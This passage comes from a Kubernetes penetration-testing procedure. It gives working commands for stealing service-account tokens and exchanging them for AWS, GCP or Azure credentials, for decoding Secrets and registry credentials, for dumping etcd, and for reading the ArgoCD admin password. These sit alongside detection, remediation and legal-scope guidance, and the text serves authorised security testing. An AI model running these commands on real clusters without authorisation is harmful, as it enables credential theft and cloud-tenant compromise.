kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."eks.amazonaws.com/role-arn" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."eks.amazonaws.com/role-arn")"'

# Inside a compromised pod with SA <ns>/<sa> bound to role <role-arn>
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Note: IRSA requires the token to have audience sts.amazonaws.com — check projected-token spec on the pod
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq .aud

aws sts assume-role-with-web-identity \
--role-arn <role-arn> \
--role-session-name pentest-session \
--web-identity-token "$TOKEN"
# Returns AccessKeyId / SecretAccessKey / SessionToken — assume the role for downstream AWS API calls

The trust policy's Condition block typically pins aud and sub (system:serviceaccount:<ns>:<sa>). Misconfigurations:

  • Missing aud condition — any pod token (with any audience) can assume.
  • Wildcard sub condition — any SA in the cluster can assume.
  • Trust policy lists * for the OIDC provider's federated principal — any cluster federated to the same provider can assume.

GKE — Workload Identity

GKE Workload Identity binds a k8s SA to a GCP IAM ServiceAccount via iam.gke.io/gcp-service-account annotation. The pod calls the GKE metadata server (metadata.google.internal), which mints a GCP access token for the bound GSA.

# Identify Workload Identity bindings
kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."iam.gke.io/gcp-service-account" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."iam.gke.io/gcp-service-account")"'

# From a compromised pod (Workload Identity must be enabled on the node pool)
curl -sH "Metadata-Flavor: Google" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'
curl -sH "Metadata-Flavor: Google" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
# Token → GCP access token for the bound GSA

GKE metadata-server hardening: nodes with Workload Identity enabled run gke-metadata-server DaemonSet that intercepts unauthorized metadata requests. Disabled-WI node pools (or specific exemption labels) leak the node's GSA token instead — often the GKE-default Compute SA with broad project rights.

AKS — Microsoft Entra Workload Identity

AKS Workload Identity (replaces deprecated AAD Pod Identity) annotates the SA with azure.workload.identity/client-id and uses an OIDC issuer + Federated Identity Credentials on the Entra App Registration.

# Identify Workload Identity bindings
kubectl get sa -A -o json | jq -r '.items[] | select(.metadata.annotations."azure.workload.identity/client-id" != null) | "\(.metadata.namespace)/\(.metadata.name) → \(.metadata.annotations."azure.workload.identity/client-id")"'

# From a compromised pod with the WI sidecar / mutating webhook injected env vars
echo $AZURE_TENANT_ID $AZURE_CLIENT_ID $AZURE_FEDERATED_TOKEN_FILE
# The webhook injects projected token at $AZURE_FEDERATED_TOKEN_FILE; exchange for Entra token
TOKEN=$(cat $AZURE_FEDERATED_TOKEN_FILE)
az login --federated-token "$TOKEN" --service-principal -u $AZURE_CLIENT_ID -t $AZURE_TENANT_ID

Bridge findings to log

  • Over-permissive bound role / GSA / Entra app — IAM rights wider than the workload requires (read-only S3 workload bound to AdministratorAccess; minimal API needed but role grants Storage Admin)
  • Trust policy / federated-credential subject claim wildcards — any SA in the cluster (or any cluster federated to the same OIDC issuer) can assume
  • Default cluster SA bound — every pod in the namespace inherits the cloud rights (vs. dedicated workload SA)
  • Cluster federated to multiple cloud-tenant trusts — single cluster compromise reaches multiple cloud tenants

T1078.004 (Valid Accounts: Cloud Accounts), T1606.002 (Forge Web Credentials: SAML Tokens [adapted to OIDC web-identity flow]).


8. Secrets, etcd & KMS

Secret enumeration

# All Secrets cluster-wide (requires get secrets cluster-wide)
kubectl get secrets -A
kubectl get secrets -A -o json | jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) (\(.type))"'

# Decode common Secret types
kubectl get secret <name> -n <ns> -o jsonpath='{.data}' | jq 'map_values(@base64d)'

# Dockerconfig (registry credentials)
kubectl get secret <name> -n <ns> -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d | jq

# TLS keymat
kubectl get secret <name> -n <ns> -o jsonpath='{.data.tls\.key}' | base64 -d > /tmp/tls.key

# kubeconfig stored as Secret (frequent on cluster-of-clusters / Crossplane / Cluster API setups)
kubectl get secret <name> -n <ns> -o jsonpath='{.data.kubeconfig}' | base64 -d > /tmp/sub-cluster.kubeconfig
kubectl --kubeconfig=/tmp/sub-cluster.kubeconfig auth can-i --list

etcd direct access (self-hosted only)

Managed offerings (EKS / AKS / GKE) hide etcd. Self-hosted clusters expose etcd on TCP/2379 with mTLS. A compromised host with read access to /etc/kubernetes/pki/etcd/ (default kubeadm path) gets the etcd client cert and can dump the entire cluster state:

# From a node with etcd client certs
ETCDCTL_API=3 etcdctl \
--endpoints=https://127.0.0.1:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get / --prefix --keys-only

# Dump every Secret (etcd encryption-at-rest may apply — check apiserver --encryption-provider-config)
ETCDCTL_API=3 etcdctl ... get /registry/secrets/ --prefix --print-value-only

Encryption-provider config

# Apiserver --encryption-provider-config (self-hosted) defines whether Secrets are encrypted at rest in etcd
# Look for 'identity' provider listed BEFORE 'aescbc'/'aesgcm'/'kms' — that's identity (no encryption)
# https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

# Managed offerings document the equivalent:
# - EKS: KMS envelope encryption for Secrets (cluster-creation-time setting; not retrofittable without re-creation [verify 2026-04-27])
# - AKS: KMS etcd-encryption (preview / GA per-region [verify 2026-04-27])
# - GKE: Application-layer Secrets Encryption with Cloud KMS

aws eks describe-cluster --name <cluster> --query 'cluster.encryptionConfig'
az aks show -n <cluster> -g <rg> --query 'securityProfile.azureKeyVaultKms'
gcloud container clusters describe <cluster> --format='value(databaseEncryption)'

KMS-provider review

KMS-bound Secrets carry metadata.annotations referencing a KMS key. The cluster-side compromise reads the envelope-encrypted blob from etcd; the apiserver decrypts on GET. Defenders-side observation: a sudden spike in kms:Decrypt calls cited by the apiserver-bound IAM role is the indicator — see Cloud Forensics §10.4.

T1552.001 (Credentials in Files), T1555.005 (Password Stores: Password Managers [adapted to k8s Secrets store]).


9. Container Images & Supply Chain

Image registry credential surfaces

# imagePullSecrets per namespace
kubectl get sa -A -o json | jq -r '.items[] | select(.imagePullSecrets != null) | "\(.metadata.namespace)/\(.metadata.name): \(.imagePullSecrets)"'

# Decode dockerconfigjson
for s in $(kubectl get secrets -A --field-selector=type=kubernetes.io/dockerconfigjson -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name} {end}'); do
ns=${s%/*}; name=${s#*/}
echo "=== $ns/$name ==="
kubectl get secret $name -n $ns -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d | jq -r '.auths | keys[]'
done

# In-cluster ECR / ACR / GCR token refresh (often via a CronJob refreshing dockerconfigjson)
# Look for CronJobs that aws ecr get-login-password / az acr login / gcloud auth — and what SA they use
kubectl get cronjob -A -o yaml | grep -E "ecr|acr|gcr|registry"

Image signing (cosign / Notation)

# Is signed-image enforcement on? (Connaisseur, Kyverno verifyImages, sigstore policy-controller)
kubectl get clusterpolicies -o yaml | grep -A5 verifyImages
kubectl get crd | grep -iE "sigstore|connaisseur|policy-controller|notary|notation"

# Cosign verify (offline)
cosign verify <image>:<tag> --key <pubkey> # key-based
cosign verify <image>:<tag> --certificate-identity <id> --certificate-oidc-issuer <issuer> # keyless / Fulcio

# SBOM extraction
cosign download sbom <image>:<tag>
syft <image>:<tag> # https://github.com/anchore/syft
grype <image>:<tag> # vulnerability scan, https://github.com/anchore/grype

CI/CD pipeline access from the cluster

ArgoCD, Flux, Tekton, and Jenkins X all run inside the cluster with elevated rights — they create resources in target namespaces, hold Git repository credentials, and (in ArgoCD's case) can be configured to apply manifests from arbitrary Git URLs.

# ArgoCD
kubectl get applications,appprojects,argocds -A # CRDs (ArgoCD CRDs vary by install)
kubectl get secret -n argocd # repo creds, cluster creds, dex secrets
# Default admin password historically lived in argocd-secret.admin.password (older ArgoCD); now in argocd-initial-admin-secret one-time bootstrap [verify 2026-04-27]
kubectl get secret argocd-initial-admin-secret -n argocd -o jsonpath='{.data.password}' | base64 -d

# Flux
kubectl get gitrepositories,kustomizations,helmreleases -A
kubectl get secret -n flux-system

# Tekton
kubectl get pipelineruns,taskruns -A

# Jenkins (often deployed in-cluster)
kubectl get svc -A | grep -i jenkins

T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1525 (Implant Internal Image).


10. Cluster Network Plane

CNI policy review

NetworkPolicies are namespaced and additive — no NetworkPolicy = no restriction. CNI must support enforcement (Cilium, Calico, Weave Net do; AWS VPC CNI requires the Calico add-on for enforcement [verify 2026-04-27]; flannel does not).

# Per-namespace NetworkPolicy presence
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
np=$(kubectl get networkpolicies -n $ns 2>/dev/null | wc -l)
echo "$ns: $((np-1)) NetworkPolicies"
done

# Identify the CNI in use
kubectl get pods -n kube-system -l k8s-app=cilium -o name 2>/dev/null
kubectl get pods -n kube-system -l k8s-app=calico-node -o name 2>/dev/null
kubectl get pods -n kube-system -l k8s-app=weave-net -o name 2>/dev/null
kubectl get pods -n kube-system -l app=flannel -o name 2>/dev/null

# Cilium-specific (eBPF policy + L7)
kubectl get ciliumnetworkpolicies,ciliumclusterwidenetworkpolicies -A 2>/dev/null

# Default-deny check (a namespace without a default-deny is wide-open egress)
kubectl get networkpolicies -A -o yaml | grep -A3 "podSelector: {}" | head -40

In-cluster DNS abuse

CoreDNS resolves <svc>.<ns>.svc.cluster.local. A compromised pod with create services rights in any namespace can register a Service with the same name as a target Service in the same namespace it can reach via DNS search domains, intercepting traffic.

# DNS resolution from a pod
kubectl run -it --rm dnsdebug --image=alpine --restart=Never -- sh
# / # cat /etc/resolv.conf
# / # nslookup kubernetes.default.svc.cluster.local

Service-mesh sidecar abuse

Istio / Linkerd inject sidecars that intercept all pod traffic. Compromised pod-injection webhook = compromised mesh.

# Istio
kubectl get crd | grep istio.io
kubectl get pods -A -l app=istiod
kubectl get authorizationpolicies,peerauthentications -A # mesh policy

# Linkerd
kubectl get crd | grep linkerd.io

NodePort / LoadBalancer / Ingress exposure

# Externally exposed Services
kubectl get svc -A --field-selector spec.type=NodePort
kubectl get svc -A --field-selector spec.type=LoadBalancer
kubectl get ingress -A
# Cross-reference with cloud-provider perimeter (NLB / ALB / Azure LB / GCP LB) — see sop-cloud-pentest §7

11. Persistence Inside the Cluster

Cluster-internal persistence outlives a pod restart, a node drain, and (often) a cluster upgrade. Each mechanism is detectable, but only if the customer's audit policy logs the relevant resource.

MechanismResourceDetection surface
DaemonSet on every nodeapps/v1.DaemonSetapiserver audit create daemonsets
CronJobbatch/v1.CronJobapiserver audit create cronjobs
Mutating admission webhookadmissionregistration.k8s.io/v1.MutatingWebhookConfigurationapiserver audit create mutatingwebhookconfigurations (high-priority rule)
Validating admission webhook…ValidatingWebhookConfigurationsame as above
ValidatingAdmissionPolicy (CEL, 1.30+)admissionregistration.k8s.io/v1.ValidatingAdmissionPolicyapiserver audit
Aggregated apiserverapiregistration.k8s.io/v1.APIServiceapiserver audit create apiservices
Operator / controller (ClusterRole + Deployment)compositeapiserver audit + ClusterRoleBinding watch
Node-level persistence (kubelet config, systemd unit, /etc/cron.d)host-levelhost EDR; out of cluster-side detection
Long-lived Secret of type kubernetes.io/service-account-tokenSecretapiserver audit create secrets
Stale system:masters group binding via aws-auth ConfigMap (EKS)ConfigMap kube-system/aws-authapiserver audit update configmaps in kube-system

Mutating webhooks are the highest-impact mechanism: a webhook with failurePolicy: Fail + universal namespaceSelector intercepts every Pod create, can inject sidecars, environment variables, or volume mounts (e.g., a hostPath mount harvesting host secrets, a side-channel exfil DaemonSet).

# Enumerate persistence-class resources with broad scope
kubectl get mutatingwebhookconfigurations -o yaml | grep -A10 "name: " | grep -E "name:|operations:|resources:|scope:|failurePolicy:"
kubectl get apiservices # aggregated APIs
kubectl get cronjobs -A -o wide
kubectl get daemonsets -A -o wide

T1547 (Boot or Logon Autostart Execution — adapted for cluster-startup), T1543.005 (Container Service).


12. Detection Coverage Validation

Every cluster has an audit policy. The question is whether the audit log reaches a SIEM, how fast, and which verbs are logged at what level.

Audit policy review

# Self-hosted: --audit-policy-file on apiserver (typical kubeadm path /etc/kubernetes/audit/policy.yaml)
# Managed: vendor exposes a fixed policy
# - EKS: control-plane audit logs go to CloudWatch Logs when "audit" log type is enabled in describeCluster.logging
# - AKS: diagnostic settings → Log Analytics workspace, Event Hubs, or Storage
# - GKE: Cloud Audit Logs (Admin Activity is on by default; Data Access requires opt-in)

aws eks describe-cluster --name <cluster> --query 'cluster.logging'
az aks show -n <cluster> -g <rg> --query 'addonProfiles.omsagent'
gcloud logging read 'resource.type="k8s_cluster"' --limit=10

Falco / Tetragon

# Falco — DaemonSet, eBPF or kernel module probe, generates events for syscall-level rules
kubectl get pods -n falco -o wide
kubectl logs -n falco -l app.kubernetes.io/name=falco | head -50

# Tetragon (Cilium) — eBPF runtime observability
kubectl get pods -n kube-system -l app=tetragon

Coverage-validation playbook

Coordinate with the customer's SOC bridge before each test. The point is to verify detection fires AND alerts reach a human; in surface-only tests, detection logic exists but pager rotation is broken or muted.

ActionExpected detectionWhere
kubectl auth can-i --list --as=system:anonymousAnonymous-auth-enabled audit, plus high User-Agent: kubectl rate from non-cluster IPapiserver audit + cloud-provider edge
kubectl create clusterrolebinding pentest-test --clusterrole=cluster-admin --user=testHigh-severity RBAC-mutation alertapiserver audit (create clusterrolebindings)
kubectl run priv-test --image=alpine --privilegedPSS-violation log; admission-controller blockAudit + admission webhook log
kubectl exec -it <pod> -- /bin/sh (in production-tier namespace)Production-namespace exec alertApiserver audit (create pods/exec)
Pod with /var/run/docker.sock hostPathFalco Container Drift Detected / Write below /etcFalco + audit
AWS WI binding exercise (AssumeRoleWithWebIdentity)AWS CloudTrail AssumeRoleWithWebIdentity event from cluster IPCloudTrail (cloud side, not cluster side)

For full SIEM-validation methodology see Detection & Evasion Testing — that SOP is the canonical home for evasion methodology and SOC validation playbooks.


13. Common Misconfigurations Checklist

Authentication & identity

  • Anonymous auth enabled (--anonymous-auth=true on apiserver, or 200 to unauthenticated /api/v1/...)
  • Legacy long-lived ServiceAccount tokens (Secrets of type kubernetes.io/service-account-token) still in use post-1.24
  • aws-auth ConfigMap (EKS) maps non-admin IAM principals to system:masters
  • Cluster-admin kubeconfig stored in plaintext on workstations or in Git

RBAC

  • default SA in any namespace bound to cluster-admin / admin / edit
  • ClusterRoleBindings to system:authenticated or system:unauthenticated
  • Wildcards in ClusterRoles (resources: ["*"] + verbs: ["*"]) outside controllers that genuinely need them
  • escalate, bind, or impersonate verbs granted to non-admin principals
  • create pods/exec granted to namespaced roles (almost always over-permissive)

Pod security

  • Namespaces without Pod Security Standards labels (defaults to privileged)
  • Existing pods with privileged: true, hostPID, hostNetwork, hostIPC
  • Existing pods mounting hostPath: /, /var/run/docker.sock, /var/lib/kubelet, /etc, /proc, /sys
  • Pods with CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, CAP_NET_ADMIN
  • runc < 1.1.12 / containerd < 1.7.13 / Docker Engine < 25.0.2 (CVE-2024-21626)

Admission control

  • No PSA / PodSecurityPolicy / Gatekeeper / Kyverno enforcing baseline or restricted on workload namespaces
  • Validating webhooks with failurePolicy: Ignore
  • Mutating webhooks with namespaceSelector exempting kube-system (then attacker uses kube-system)
  • Gatekeeper Config excludedNamespaces over-broad

Workload identity

  • IRSA / WI / Pod Identity bound role wider than the workload requires
  • OIDC trust-policy missing aud or sub Condition
  • Multiple clusters federated to the same OIDC issuer with overlapping trust
  • Default cluster SA bound to a cloud-provider role (every pod inherits)

Secrets & etcd

  • Apiserver --encryption-provider-config lists identity first (no encryption)
  • Self-hosted etcd reachable from worker nodes (lateral movement to etcd from a compromised node)
  • Secrets containing kubeconfigs, cloud credentials, registry creds with no rotation evidence

Networking

  • CNI does not enforce NetworkPolicy (flannel, AWS VPC CNI without Calico add-on)
  • No default-deny NetworkPolicy in workload namespaces
  • Public NodePort / LoadBalancer Services for internal-only workloads
  • Ingress controller exposes /metrics, /actuator, or admin endpoints unauthenticated

Supply chain

  • No image-signing enforcement (Connaisseur / Kyverno verifyImages / sigstore policy-controller absent)
  • imagePullPolicy: Always not enforced (mutable tags can be repointed)
  • ArgoCD admin password is bootstrap default, or argocd-server exposed publicly
  • Helm chart repos / OCI registries unauthenticated

Detection

  • EKS / AKS / GKE control-plane audit logs not enabled in describeCluster.logging / diagnosticSettings / cloud logging
  • No Falco / Tetragon / GuardDuty EKS Audit Log / Defender for Containers / GKE Security Posture
  • Audit policy at Metadata level only (request bodies missing — no RBAC-mutate forensics)

14. Evidence Collection

/Evidence/{engagement_id}/k8s/
├── recon/
│ ├── 20260427_kubectl-version.json
│ ├── 20260427_api-resources.txt
│ ├── 20260427_nodes-wide.txt
│ └── 20260427_namespaces-pss-labels.txt
├── rbac/
│ ├── 20260427_clusterroles.baseline.yaml
│ ├── 20260427_clusterrolebindings.baseline.yaml
│ ├── 20260427_roles-all.baseline.yaml
│ ├── 20260427_rolebindings-all.baseline.yaml
│ ├── 20260427_serviceaccounts.baseline.yaml
│ ├── 20260427_kubiscan-risky-roles.txt
│ └── 20260427_can-i-list-as-default-sa.txt
├── pod-security/
│ ├── 20260427_pods-with-hostpath.json
│ ├── 20260427_pods-with-priv-or-hostpid.json
│ └── 20260427_pods-with-dangerous-caps.json
├── admission/
│ ├── 20260427_validatingwebhooks.yaml
│ ├── 20260427_mutatingwebhooks.yaml
│ ├── 20260427_gatekeeper-config.yaml
│ └── 20260427_kyverno-policies.yaml
├── workload-identity/
│ ├── 20260427_irsa-bindings.txt
│ ├── 20260427_gke-wi-bindings.txt
│ └── 20260427_aks-wi-bindings.txt
├── secrets/
│ └── 20260427_secrets-inventory-by-type.txt # types only — never raw secret material
└── audit-evidence/
├── 20260427_apiserver-audit-event-ids.txt # for each test command
└── 20260427_screenshots/
# Hash every artifact at engagement close
sha256sum * > evidence_hashes.txt

Per-action audit-event ID capture is what lets the customer correlate test activity in their SIEM. Without it, defenders cannot reproduce the timeline. Pattern per Collection Log.

For tokens harvested during testing (legacy SA tokens, bound projected tokens, IRSA / WI tokens, kubeconfigs): encrypt at rest, log who accessed them, schedule destruction in the engagement letter. Tokens are replayable identity material until they expire (1h default for bound tokens; legacy tokens never expire until revoked).


15. Reporting

Finding Format

**Title:** &lt;Cluster&gt; · &lt;Layer&gt; · &lt;Issue&gt; — e.g. "prod-eks-1 · RBAC · default SA in namespace `app` bound to cluster-admin"
**Severity:** Critical / High / Medium / Low / Info
**Cluster:** &lt;name&gt; (&lt;endpoint-host&gt;, &lt;region&gt;)
**Namespace(s):** &lt;list&gt; or "Cluster-wide"
**Affected Resources:** <Kind/Namespace/Name list>
**Description:** <what the misconfiguration is, in cluster-neutral terms where possible>
**Attack Path:** <step-by-step, named primitives, no production-data screenshots>
**Impact:** <data confidentiality / integrity / availability + blast radius — pod / namespace / cluster / cloud-provider tenant>
**Evidence:** <apiserver audit event IDs, UTC timestamps, SHA-256 of captured manifests>
**Remediation:** <RBAC change, NetworkPolicy, PSA label, admission policy manifest snippet preferred>
**References:** <CIS Kubernetes Benchmark control / NSA-CISA Hardening section / k8s docs URL>

Remediation Priority

  1. Cluster-admin / system:masters paths from low-privilege SA (Critical — fix in hours)
  2. Pod-escape primitives in production namespaces (Critical — privileged/hostPath/hostPID + multi-tenant nodes)
  3. Workload-identity binding to over-permissive cloud role (Critical — bridge to cloud-tenant compromise)
  4. Apiserver audit logging disabled or not reaching SIEM (High — without logs, no IR)
  5. Admission-controller bypass paths (High — PSS unenforced, webhook Ignore-policy on security-critical webhooks)
  6. Etcd encryption-at-rest disabled (identity provider) (High — every Secret in plaintext at rest)
  7. CNI without NetworkPolicy enforcement OR no default-deny (High — east-west wide-open)
  8. Image-signing not enforced (Medium-High depending on image-pull surface)
  9. Long-lived legacy SA tokens still in use post-1.24 (Medium — token rotation gap)
  10. Documentation / labeling drift, missing PSA labels on system namespaces (Low-Info)

16. Tools Reference

ToolPurposeLink
kubectl + kubectl auth can-iApiserver client + RBAC self-checkkubernetes.io/docs/reference/kubectl
krewkubectl plugin managerkrew.sigs.k8s.io
peiratesPost-exploit toolkit (RBAC abuse, escape primitives)github.com/inguardians/peirates
kube-hunterActive + passive cluster discovery / vuln scan (Aqua)github.com/aquasecurity/kube-hunter
kubeauditManifest + cluster security auditgithub.com/Shopify/kubeaudit
kube-benchCIS Kubernetes Benchmark check (Aqua)github.com/aquasecurity/kube-bench
KubescapeSecurity posture + risk score (ARMO, CNCF Sandbox [verify 2026-04-27])github.com/kubescape/kubescape
KubiScanRBAC risk scanner (Cyberark)github.com/cyberark/KubiScan
rbac-toolRBAC analysis + visualizationgithub.com/alcideio/rbac-tool
rbac-lookupInverse-RBAC query (FairwindsOps)github.com/FairwindsOps/rbac-lookup
PolarisManifest validation + RBAC checks (FairwindsOps)github.com/FairwindsOps/polaris
PopeyeCluster sanitizer (resource hygiene)github.com/derailed/popeye
amicontainedIdentify container runtime + capability setgithub.com/genuinetools/amicontained
deepceDocker container enumeration + escape primitivesgithub.com/stealthcopter/deepce
cdkContainer DDOS toolkit / escape PoC collectiongithub.com/cdk-team/CDK [verify 2026-04-27]
Bad Pods (Bishop Fox)Eight escape-recipe pod manifestsgithub.com/BishopFox/badPods
OPA GatekeeperAdmission policy engine (CNCF)open-policy-agent.github.io/gatekeeper
KyvernoCRD-native admission policy enginekyverno.io
FalcoRuntime threat detection (CNCF)falco.org
TetragoneBPF runtime observability (Cilium / Isovalent)tetragon.io
sigstore cosignContainer image signing (sigstore)github.com/sigstore/cosign
NotationOCI artifact signing (CNCF, Notary v2)github.com/notaryproject/notation
Syft / GrypeSBOM + vuln scan (Anchore)github.com/anchore/syft
TrivyAll-in-one cluster + image + IaC scanner (Aqua)github.com/aquasecurity/trivy
KubeStrikerKubernetes security audit + attack surface analyzergithub.com/vchinnipilli/kubestriker [verify 2026-04-27]
Steampipe (k8s + helm plugins)SQL-over-cluster / over-Helm-releasesteampipe.io/plugins/turbot/kubernetes
CartographyMulti-cloud + k8s asset graph (CNCF Sandbox)github.com/cartography-cncf/cartography

17. Reference Resources

Comprehensive Knowledge Bases

Hardening & Benchmarks

Attack Research

CSP-Specific Managed-K8s Documentation

Practice Platforms

Certifications

  • CKS — Certified Kubernetes Security Specialist (CNCF + Linux Foundation) — practical exam covering hardening, runtime, supply-chain
  • OSCP / OSCE / OSEP (Offensive Security) — adjacent; container modules in newer revisions

18. Common Pitfalls

  • ❌ Running kubectl create clusterrolebinding / apply -f bad-pod.yaml without explicit named-resource authorization in the RoE
  • ❌ Treating kubectl auth can-i --list as harmless — it does not mutate, but it generates apiserver audit volume that triggers RBAC-recon detection rules
  • ❌ Skipping the cluster fingerprint (k8s version, CNI, CRI, admission stack) — escape-primitive feasibility depends entirely on the fingerprint
  • ❌ Detonating runc / containerd / CRI-O escape PoCs against production runtimes without a version-matched lab rehearsal first
  • ❌ Reporting "RBAC over-permissive" without naming the specific verb-resource pair and the path it enables
  • ❌ Pivoting a workload-identity binding to the cloud-provider tenant without that tenant's separate written authorization
  • ❌ Enumerating other tenants' namespaces in a multi-tenant cluster without scope authorization
  • ❌ Mixing customer evidence into the operator's personal cluster — use a dedicated engagement evidence bucket / storage
  • ❌ Reporting findings without apiserver audit-event IDs — defenders cannot reproduce; finding looks fabricated
  • ❌ Forgetting that managed-k8s control-plane audit logs are opt-in on EKS / AKS (and Data Access on GKE) — your detection-coverage finding may be that the customer didn't enable audit at all
  • ❌ Leaving testing artifacts — debug pods, ephemeral containers, kubectl debug copies, RoleBindings, CronJobs, mutating webhooks — running after engagement close
  • ❌ Using kubectl exec --insecure-skip-tls-verify in a hurry; the TLS chain is part of the evidence trail

Kubernetes pentesting touches three trust boundaries — the cluster API plane, the workload-identity bridge to the cloud-provider tenant, and the multi-tenant node host — and the legal exposure compounds across them. The canonical legal framework is in Legal & Ethics; this section names only the k8s-specific exposures.

  • CSP managed-k8s pentesting policy is binding. AWS, Azure, and GCP each maintain a managed-k8s-pentesting policy separate from generic cloud-pentesting policy [verify 2026-04-27]. Some primitives (control-plane DDoS, kube-apiserver-targeted scanning rate, exploiting CSP-managed control-plane CVEs) are prohibited regardless of customer authorization. Re-read at the start of each engagement.
  • Scope is per-cluster, per-namespace, per-action-class. A signed RoE that authorizes "the Kubernetes environment" without naming clusters, namespaces, and the action classes (read-only / RBAC-mutate / pod-escape / WI-exercise) is too vague.
  • Workload-identity exercise crosses tenant boundaries. Exercising an in-scope SA's binding to IRSA / GKE Workload Identity / AKS Pod Identity mints a cloud-provider token and reaches the cloud-provider tenant as the bound IAM principal. That tenant's authorization is required separately. See Cloud Pentesting for the cloud-side authorization framework.
  • Multi-tenant cluster scope. In SaaS clusters and namespace-as-a-service deployments, every tenant on the cluster is a separate authorization subject. Tenant-A's pentest does not authorize you to enumerate or describe Tenant-B's namespaces.
  • Customer data is regulated. Reading Secrets, ConfigMaps with sensitive data, persistent-volume contents, or pod-resident application state can trigger GDPR Art. 6/9, HIPAA, PCI DSS, or sector-specific obligations. Default to type-only enumeration; any read of Secret data, application data, or PV contents needs named authorization.
  • Persistent admission-controller mutations are uniquely sensitive. Mutating webhooks, ValidatingAdmissionPolicies, aggregated apiservers, and CRD-bound controllers can persist long after the engagement. Get each in writing; rotate / revert at engagement close; document the rotation in the report.
  • Image registry actions are out-of-scope by default. Even with cluster-admin, pushing / overwriting / deleting images in a registry reaches the registry's tenant — separate authorization required from the registry owner.
  • CSAM / sensitive-crime content. If pod logs, persistent volumes, or in-cluster object storage surface CSAM, trafficking, or threat-to-life indicators, hard-stop and route per Sensitive Crime Intake & Escalation — URL + timestamp only, no content preservation.
  • Cost can be the finding. A pod-escape PoC that crashes a node DaemonSet, a kubectl get pods --watch left running, a kubectl debug that copies a 200GB pod — these are real engagement-cost outcomes. Set a cost ceiling in the RoE; monitor billing alerts.

OPSEC framing (operator handle, sacrificial-account pool, IOC defang in the report) lives in OPSEC.


Engagement governance:

Pentesting & Security (offensive — siblings and parents):

  • Cloud Pentesting — Managed-k8s control-plane / management-API review (EKS / AKS / GKE) lives there; this SOP picks up at the cluster API plane. Workload-identity exercise crosses back to the cloud-pentest authorization framework.
  • Linux Pentesting — Host-level LPE on a worker node after a pod escape lands a process there. This SOP stops at the namespace boundary; that SOP owns kernel-CVE detonation and node-host persistence.
  • Active Directory Pentesting — Hybrid clusters with Entra ID + AKS Workload Identity; AD-Authentication-bridged identity surfaces.
  • Web Application Security — SSRF-to-metadata-server-to-SA-token chain; ingress-controller authorizer bypass; admin-endpoint exposure on in-cluster web apps.
  • Vulnerability Research — 0-day discovery in CRI runtimes, admission-controller webhooks, custom Operators.
  • Bug Bounty Methodology — Cloud-bounty programs (AWS VRP, MSRC Cloud, GCP VRP) cover managed-k8s control planes; bounty-side scope.
  • Detection Evasion Testing — SIEM-validation playbooks; Falco / Tetragon / GuardDuty EKS Audit Log / Defender for Containers / GKE Security Posture coverage validation.

Analysis (defensive counterparts):

  • Cloud Forensics — Defensive counterpart; §10 owns the apiserver-audit-log-driven IR reconstruction. This SOP's offensive findings answer the threat model that cloud-forensics methodology investigates.
  • Malware Analysis — Cluster-resident payloads (cryptominers in pods, supply-chain-compromised images, malicious Helm charts, OCI artifact tampering).
  • Cryptography Analysis — TLS / kubeconfig-cert / image-signing primitive review (cosign keys, Notation roots, JWT signing chains).
  • Forensics Investigation — Post-engagement IR support; node-host-resident artifacts (pod-resident binary on a worker node) routed for deep parsing.

Version: 1.0 · Last Updated: 2026-04-27 · Review Frequency: Quarterly (fast-rotating k8s minor-version landscape, admission-controller projects, runtime CVEs, and managed-k8s feature drift across EKS / AKS / GKE)